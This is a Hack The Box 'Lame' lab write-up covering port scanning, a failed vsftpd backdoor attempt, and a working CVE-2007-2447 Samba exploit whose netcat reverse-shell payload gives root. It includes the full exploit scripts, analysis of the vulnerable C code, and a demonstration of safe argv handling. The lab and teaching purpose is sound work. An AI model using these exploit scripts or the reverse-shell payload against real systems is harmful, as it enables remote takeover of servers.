HTB Lame Writeup

Notes

Lame

- Name: Explore
- OS: Linux
- Release date: 14 Mar 2017
- Difficulty: Easy
- IP: 10.10.10.3

Port Scan

I started with an nmap scan of this machine to enumerate open ports.

```
nmap -p- --min-rate 1000 10.10.10.3 -oN allPorts.nmap -Pn -v
```

- `-p-` – Scan all ports
- `--min-rate 1000` – Speed up the scan
- `-oN` – Save the output to a file
- `-Pn` – Skip host discovery
- `-v` – Verbose (show more output as the scan is running)

```
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd
```

With a list of open ports, I then did a deeper nmap scan to enumerate service versions and run safe scripts.

```
nmap -p 21,22,139,445,3632 -oN scriptScan.nmap -sVC 10.10.10.3 -Pn
```

- `-p` – Scan the specified ports
- `-oN` – Save the output to a file
- `-sVC` – Determine service version & run default NSE scripts

```
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.5
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-09-14T17:28:46-04:00
|_clock-skew: mean: 2h00m14s, deviation: 2h49m47s, median: 10s
```

21/TCP FTP

Anonymous login is enabled but there is nothing.

```
┌─[✗]─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
```

nmap determined that this FTP server is running vsFTPd 2.3.4. It’s always worth searching for a CVE when a version is found. I used searchsploit and found a backdoor command execution vulnerability!

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $searchsploit vsFTPd 2.3.4
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                       | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                          | unix/remote/17491.rb
---------------------------------------------------------------------------------------------------------------- ---------------------------------
```

searchsploit has a -m switch that will “mirror” (i.e. copy) an exploit to the current working directory.

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $searchsploit -m unix/remote/49757.py
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /opt/exploitdb/exploits/unix/remote/49757.py
File Type: Python script, ASCII text executable

Copied to: /home/zon/htb/lame/49757.py
```

Before running an exploit, I like to read through it to make sure it is “safe” and that there is no backdoor or anything unintended happening. It looks pretty good to me. It will connect to the server using the username nergal:) and then connect to port 6200 for the shell.

```
┌─[zon@pwn][~/htb/lame]
└──╼ $cat 49757.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
```

I ran the exploit, but it did not work!

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 49757.py 10.10.10.3
id
ls
```

To double-check, I tried the exploit manually and it still did not work.

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:zon): nergal:)
331 Please specify the password.
Password:
500 OOPS: priv_sock_get_result
Login failed.
421 Service not available, remote server has closed connection
```

22/TCP SSH

SSH usually has a low attack surface. I googled OpenSSH 4.7p1 to see if there were any public exploits, but I could not find one, so let’s move on.

139/TCP & 445/TCP SMB

nmap determined that smbd 3.0.20-Debian is running on this server. I googled smbd 3.0.20-Debian and the first link was an exploit-db entry for an RCE exploit, CVE-2007-2447. This exploit is in Metasploit, but I like to stay away from Metasploit and understand how the exploit works (below I will do an in-depth analysis of this exploit). I did another Google search for CVE-2007-2447 and the first link was to this repo.

usermap_script.py

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print("[+] Payload was sent - check netcat !")

if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
```

To run this exploit, I will set up a nc listener with `nc -lvnp 9001` and then run the exploit.

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 usermap_script.py 10.10.10.3 445 10.10.14.5 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
```

Back on netcat I get a shell as root!

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.3] 45130
whoami
root
```

CVE-2007-2447 - Samba usermap script

Samba 3.0.0 - 3.0.25rc3 are vulnerable to CVE-2007-2447, which allows a remote attacker to execute commands via the username parameter.

Two files are important to this exploit: smbrun.c and map_username.c.

map_username.c

In the code below we can see that command is built from cmd and user. cmd will be set to a script defined in smb.conf, and user will be set to whatever we supply. Putting it all together, a normal request will look like /etc/samba/script/usermap.sh "Zonifer". That string is then sent to smbrun.

```c
if ( *cmd ) {
        char **qlines;
        pstring command;
        int numlines, ret, fd;

        /* the client-supplied user name is formatted into the command string */
        pstr_sprintf( command, "%s \"%s\"", cmd, user );

        DEBUG(10,("Running [%s]\n", command));
        /* the resulting string is handed to smbrun() */
        ret = smbrun(command, &fd);
        DEBUGADD(10,("returned [%d]\n", ret));

        if ( ret != 0 ) {
                if (fd != -1)
                        close(fd);
                return False;
        }
```

smbrun.c

Below is the part of the smbrun function that will execute /bin/sh -c with that command string, i.e. sh -c '/etc/samba/script/usermap.sh "Zonifer"'. Because there is no input sanitization, shell metacharacters in the username reach the shell started by execl, and we can execute any command we want! The payload will look like /=`nohup {payload}`.

```c
#ifndef __INSURE__
        /* close all other file descriptors, leaving only 0, 1 and 2. 0 and
           2 point to /dev/null from the startup code */
        {
        int fd;
        for (fd=3;fd<256;fd++) close(fd);
        }
#endif

        execl("/bin/sh","sh","-c",cmd,NULL);

        /* not reached */
        exit(82);
        return 1;
}
```
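
The two excerpts above combine into a shell injection. The following C program is an added example, not Samba's code and not part of the original post: it builds the command with the same `"%s \"%s\""` format and runs it through `sh -c`, then runs the same script with the name passed as a plain argv element. `/bin/echo` stands in for the configured map script, the input is constructed and harmless, and `run_capture`, `map_user_shell` and `map_user_argv` are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Added example, not Samba source. Assumption: /bin/echo stands in for the map script. */
#define MAP_SCRIPT "/bin/echo"

/* Fork, exec argv, capture the child's stdout in out; returns its exit status. */
static int run_capture(char *const argv[], char *out, size_t len) {
    int p[2], status = -1;
    size_t used = 0;
    ssize_t n;
    pid_t pid;
    if (pipe(p) < 0) return -1;
    if ((pid = fork()) < 0) { close(p[0]); close(p[1]); return -1; }
    if (pid == 0) {                      /* child: stdout -> pipe */
        dup2(p[1], STDOUT_FILENO);
        close(p[0]); close(p[1]);
        execv(argv[0], argv);
        _exit(82);                       /* exec failed */
    }
    close(p[1]);
    while (used < len - 1 && (n = read(p[0], out + used, len - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(p[0]); waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Vulnerable pattern from the excerpts: format the name, then run it via sh -c. */
int map_user_shell(const char *user, char *out, size_t len) {
    char command[1024];
    snprintf(command, sizeof command, "%s \"%s\"", MAP_SCRIPT, user);
    char *argv[] = { "/bin/sh", "-c", command, NULL };
    return run_capture(argv, out, len);
}

/* Hardened pattern: no shell; the name is one argv element, never parsed. */
int map_user_argv(const char *user, char *out, size_t len) {
    char *argv[] = { MAP_SCRIPT, (char *)user, NULL };
    return run_capture(argv, out, len);
}

int main(void) {
    char a[256], b[256];
    map_user_shell("/=`echo INJECTED`", a, sizeof a);  /* constructed input */
    map_user_argv("/=`echo INJECTED`", b, sizeof b);
    printf("sh -c: %sexecv: %s", a, b);
    return 0;
}
```

With `sh -c` the backticks inside the double quotes are expanded by the shell and the script receives `/=INJECTED`; without a shell the script receives the name unchanged.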

With a quick modification to the exploit code, I can write a file to /tmp.

```python
#!/usr/bin/python3
import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport):
    payload = 'touch /tmp/zon.txt'
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except:
        print("[+] Payload was sent")

if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    print("[+] Connecting !")
    rhost = sys.argv[1]
    rport = sys.argv[2]
    exploit(rhost, rport)
```

Contents of /tmp before

```
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root
```

Run exploit

```
┌─[zon@pwn]─[~/htb/lame]
└──╼ $python3 mod.py 10.10.10.3 445
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
```

View /tmp

```
ls
5573.jsvc_up
hago
vgauthsvclog.txt.0
vmware-root
zon.txt
```

This post is licensed under CC BY 4.0 by the author.